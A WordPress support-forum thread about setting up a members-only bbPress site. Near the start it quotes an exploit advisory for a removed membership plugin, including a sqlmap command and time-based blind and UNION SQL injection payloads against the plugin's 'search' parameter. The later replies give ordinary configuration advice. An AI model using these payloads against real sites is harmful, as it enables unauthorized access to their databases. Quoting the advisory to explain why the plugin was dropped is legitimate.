my virus checker doesn’t like sploitus website – what is the nature of the exploitation ?
The Plugin was (luckily) not installed. We just decided to use it, then we saw that wordpress has taken it down on their Plugin Site.
The exploit seems to be an SQL Injection.
# 1. Description
The GET parameters “search” and “sidx” does not sanitize user input when searching for badges.
# 2. Proof of Concept (PoC)
Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
Referer: http://192.168.0.63/wp-admin/admin.php?page=supsystic-membership&module=badges&action=index
sqlmap -r request.txt –dbms=mysql -p search
Parameter: search (GET)
Type: time-based blind
Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s’ AND (SELECT 8958 FROM (SELECT(SLEEP(5)))oBIL) AND ‘trjK’=’trjK&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc
Type: UNION query
Payload: route=badges.getTblList&wpnonce=729ac6199a&action=supsystic-membership&search=s’ UNION ALL SELECT NULL,CONCAT(0x71786a6b71,0x6569796370704c625352574e6e424874456a74457847635473525a466d47576f775a46446b4e7055,0x716a7a6a71),NULL,NULL– -&_search=false&nd=1596991012186&rows=10&page=0&sidx=id&sord=desc
If you are happy to have a hands on approach to user registrations, then you probably don’t need a membership plugin.
As far as the bbpress part goes
forums set to public are viewable by anyone
forums set to private are viewable only by registered users
so if you set forums to private they will not appear to unregistered users, so only visible once a user has logged in. If you set not to allow anonymous posting (dashboard>settings>forums) , then only registered users will be able to post.
bbpress just uses wordpress users for login and registration with an extra bbpress parameter, so you can just use wordpress to set up users.
If you are going to have manual registration, then you turn off ‘anyone can register’ in wordpress (dashboard>settings>general>membership), and create a form using a form plugin (eg contact form 7) to let users ask to register with whatever fields you want. This will be emailed to whoever you want, who can then decide if they should allow membership.
You can then take payment manually (eg bank transfer) or via say a Paypal link on your site.
The approver would then add the user (2 minutes or less).
As far as wordpress page content then use a plugin that restricts content to registered users such as
Content Control – User Access Restriction Plugin
finally you would use
bbPress Messages
to allow uses to message each other – don’t worry that this plugin has not been updated for a while – it is stable and works
as far as I can see that would meet your requirements list.
Thank you very much! I will implement and test it over the next few days, but your solution sounds just perfect!
You saved me! Thanks. 🙂
I’ve implemented your solution and it works pretty good so far. Thanks again.
When I go to the URL of a private Forum (while not logged in) it just throws a 404. Can I somehow redirect the User to a Login page?
bbp style pack
once activated go to
dashboard>settings>bbp style pack>Subscription Emails and there is a box to tick item 2 auto login and the appropriate login
